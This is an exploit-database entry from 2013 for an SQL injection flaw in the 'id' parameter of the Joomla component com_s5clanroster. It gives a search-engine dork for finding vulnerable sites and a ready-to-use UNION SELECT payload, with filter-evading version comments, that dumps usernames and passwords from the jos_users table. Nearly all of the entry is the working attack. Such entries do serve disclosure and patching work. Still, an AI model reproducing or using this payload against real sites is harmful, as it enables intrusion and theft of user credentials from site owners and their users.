Joomla! Component com_s5clanroster - 'id' SQL Injection

Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port: 
date_added: 2013-05-13 
date_updated: 2016-11-01 
verified: 1 
codes: OSVDB-93457 
tags: 
aliases:  
screenshot_url:  
application_url: 

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
===[ Exploit ]===

Sql Injection:
==============

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################